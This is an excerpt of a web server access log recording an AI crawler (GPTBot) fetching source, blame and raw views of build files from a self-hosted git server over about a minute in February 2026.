"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:17:08:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11118] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:17:08:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=source" [Client 74.7.227.38] [Length 14657] [Gzip 5.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:17:08:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=source" [Client 74.7.227.38] [Length 14656] [Gzip 5.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:17:08:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11115] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:17:08:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/appsettings.json?display=source" [Client 74.7.227.38] [Length 11493] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/appsettings.json" +[17/Feb/2026:17:08:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/xref-AssetPilot.html?display=rendered" [Client 74.7.227.38] [Length 10938] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/xref-AssetPilot.html" +[17/Feb/2026:17:08:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html?display=rendered" [Client 74.7.227.38] [Length 10970] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" +[17/Feb/2026:17:08:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html?display=source" [Client 74.7.227.38] [Length 522366] [Gzip 19.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" +[17/Feb/2026:17:08:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html?display=source" [Client 74.7.227.38] [Length 522409] [Gzip 19.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" +[17/Feb/2026:17:08:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/xref-AssetPilot.html?display=rendered" [Client 74.7.227.38] [Length 10972] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/xref-AssetPilot.html" +[17/Feb/2026:17:08:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html?display=rendered" [Client 74.7.227.38] [Length 10939] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" +[17/Feb/2026:17:08:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" +[17/Feb/2026:17:08:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" +[17/Feb/2026:17:08:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" [Client 74.7.227.38] [Length 474045] [Gzip 19.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3" +[17/Feb/2026:17:08:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" [Client 74.7.227.38] [Length 492029] [Gzip 19.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2" +[17/Feb/2026:17:08:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake?display=rendered" [Client 74.7.227.38] [Length 11164] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:17:08:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake?display=rendered" [Client 74.7.227.38] [Length 11164] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:17:08:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake?display=rendered" [Client 74.7.227.38] [Length 11166] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:17:08:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 15646] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:17:08:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 15649] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:17:08:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 15621] [Gzip 6.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:17:08:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 15647] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:17:08:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 15646] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:17:08:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip3.12?display=rendered" [Client 74.7.227.38] [Length 11018] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip3.12" +[17/Feb/2026:17:08:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" [Client 74.7.227.38] [Length 9919] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" +[17/Feb/2026:17:08:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" [Client 74.7.227.38] [Length 722314] [Gzip 27.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" +[17/Feb/2026:17:08:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" [Client 74.7.227.38] [Length 9919] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" +[17/Feb/2026:17:08:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" [Client 74.7.227.38] [Length 819599] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" +[17/Feb/2026:17:08:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" [Client 74.7.227.38] [Length 749428] [Gzip 27.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" +[17/Feb/2026:17:08:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:17:08:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:17:08:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 9934] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:17:08:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 9956] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:17:08:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:17:08:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 17061] [Gzip 12.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:17:08:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 17059] [Gzip 12.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:17:08:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 17035] [Gzip 12.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:17:08:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 17059] [Gzip 12.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:17:08:42 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/-" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" +[17/Feb/2026:17:08:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 17060] [Gzip 12.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:17:08:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" [Client 74.7.227.38] [Length 788394] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" +[17/Feb/2026:17:08:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 7578] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:17:08:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 7578] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:17:08:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 7578] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:17:08:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 7578] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:17:08:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 7578] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:17:08:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr 